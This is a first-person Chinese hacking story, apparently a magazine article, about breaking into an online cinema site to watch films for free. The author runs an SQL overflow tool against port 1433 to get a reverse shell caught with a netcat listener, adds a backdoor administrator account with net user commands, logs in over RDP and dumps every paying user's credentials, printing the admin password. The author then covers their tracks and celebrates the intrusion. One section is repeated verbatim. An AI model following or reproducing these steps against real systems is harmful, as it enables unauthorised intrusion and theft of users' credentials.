最近对网上看电影比较感兴趣,于是登录至某“在线影院”。本以为是免费,谁知问我要账号和密码,我可不想为这个掏钱。怎么办?先探探路。对我而言,入侵的过程是充满乐趣的,它刺激着我大脑的每一根神经,让我兴奋无比。我喜欢体味这种思维无拘放荡的快感,我喜欢沉醉其中。这是黑客营人的风格。于是,X-Scan开始勤恳地跑在了我的桌面上。
破门:久违的溢出工具
用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?
先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.*
61.157.*.*
0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:WinNTsystem32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
破门:久违的溢出工具
用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。
通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?
先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.*
61.157.*.*
0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:WinNTsystem32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。
遇阻:寻找VOD电影
首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。
可随后的情况让我呆住了,这台机器一共就C盘和D盘两个盘,容量加到一起也才20GB,这个容量是不可能装下上百部电影的,我要的VOD电影在哪里?
电影文件一定是放在了另外一台机器上,而那台机器一定和这台Server是联网的。同时,经过我对“在线影院”网页文件的分析,也证实了这一点:电影文件不在本地,而是借助MS SQL的索引和归类来远程提取的。这本来就是一个IIS5.0+MS SQL的站点嘛。
我又一次打开了“管理工具”,在里面的“DNS”里也发现了一个名叫“VOD”的节点,IP指向了一个与Server紧邻的地址,我要找的就是这个“VOD”了。考虑到Server和VOD之间密切的通讯关系,我很自然地打开了Server的“网上邻居”,果然不出所料,整个组里就两台机器,正是Server和VOD。双击VOD的图标,该死的系统又提示输入用户名和密码,看来网管在“网上邻居”上访问VOD时没有保存密码,我该到哪儿去找密码呢?
得手:挖出VOD登录账号密码
就在我准备彻底放弃的那一刹那,脑子里突然闪过一个念头:如果网管他自己要看电影怎么办呢?途径不外有二:一是直接在VOD上观看,二就是在server主页上输入他自己的账号密码进行观看。既然途径一我现在没法实现,那么途径二呢?就算网管是直接在VOD上操作文件,可至少在Server的网页上他应该有一个账号用来进行测试之用。
接下来就是在Server这台机器中找账号密码了。直奔Server的MS SQL数据库。用3389登录Server,点击“开始”→“程序”→“Microsoft SQL Server”→“企业管理器”,然后在当前服务器名“Server”下打开“数据库”。发现一个名为“web_new”的可疑库,应该就是它了!打开它,选择其中的“表”,右边就列出了这个库里的所有表名,经过观察分析,锁定了一个名为“ZH_guanli”的表,先看看它的内容。鼠标右击它,选择“导出”→“导出所有行”。就那么一眨眼的工夫,Oh,My God,这不是账号是什么啊?所有的付费用户的账号密码都在这儿呢!呵呵,不好意思,我Copy了所有的列,然后保存到了我的本地机器中。这些账号的第一个就是admin,应该是网管的了,密码为wzl19750529。
接下来擦干净了“脚印”,重新登录网页,输入网管的账号密码,终于看见电影顺利播放了,胜利!
后记:
入侵,是一个可深可浅的问题。我的大多数入侵都没有用上很高深的学问和知识。整个过程关键在于入侵者的思路和分析,能善于找出漏洞和利用漏洞,找出最简单有效的入侵方法,这才是黑客之道。还有,特别要提醒初学者,“入侵”并不等于“破坏”!大家要把握好这个度。